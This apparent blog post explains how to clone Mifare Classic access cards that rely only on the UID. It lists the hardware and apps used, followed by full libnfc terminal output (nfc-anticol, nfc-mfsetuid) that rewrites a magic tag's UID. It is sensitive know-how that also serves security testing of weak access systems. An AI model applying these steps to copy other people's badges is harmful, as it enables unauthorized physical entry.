Nov 102016
 

I observed that most Mifare Classic based access cards use only the first 4 bytes (the ID). These can be read using an Android phone and for example “NFC Taginfo” app. Afterwards cloning can be done using an ACR122U and “chinese clone tags”. These tags are special. They allow reading AND writing of the first 4 bytes, while others don’t. On Linux changing the tag ID (first 4 bytes) can be done using libnfc. The output may look like this (changing ID from 01234567 to da08738d):

Check tag ID:

root@laptop:~/rfid# nfc-anticol 
NFC reader: ACS / ACR122U PICC Interface opened

Sent bits:     26 (7 bits)
Received bits: 04  00  
Sent bits:     93  20  
Received bits: 01  23  45  67  00  
Sent bits:     93  70  01  23  45  67  00  d0  6f  
Received bits: 08  b6  dd  
Sent bits:     50  00  57  cd  

Found tag with
 UID: 01234567
ATQA: 0004
 SAK: 08

Change ID to da08738d

root@laptop:~/rfid# nfc-mfsetuid da08738d
NFC reader: ACS / ACR122U PICC Interface opened
Sent bits:     26 (7 bits)
Received bits: 04  00  
Sent bits:     93  20  
Received bits: 01  23  45  67  00  
Sent bits:     93  70  01  23  45  67  00  d0  6f  
Received bits: 08  b6  dd  

Found tag with
 UID: 01234567
ATQA: 0004
 SAK: 08

Sent bits:     50  00  57  cd  
Sent bits:     40 (7 bits)
Received bits: a (4 bits)
Sent bits:     43  
Received bits: 0a  
Sent bits:     a0  00  5f  b1  
Received bits: 0a  
Sent bits:     da  08  73  8d  2c  08  04  00  46  59  25  58  49  10  23  02  c2  99  
Received bits: 0a  

Check if write was successful:

root@laptop:~/rfid# nfc-anticol 
NFC reader: ACS / ACR122U PICC Interface opened

Sent bits:     26 (7 bits)
Received bits: 04  00  
Sent bits:     93  20  
Received bits: da  08  73  8d  2c  
Sent bits:     93  70  da  08  73  8d  2c  bd  37  
Received bits: 08  b6  dd  
Sent bits:     50  00  57  cd  

Found tag with
 UID: da08738d
ATQA: 0004
 SAK: 08
root@laptop:~/rfid#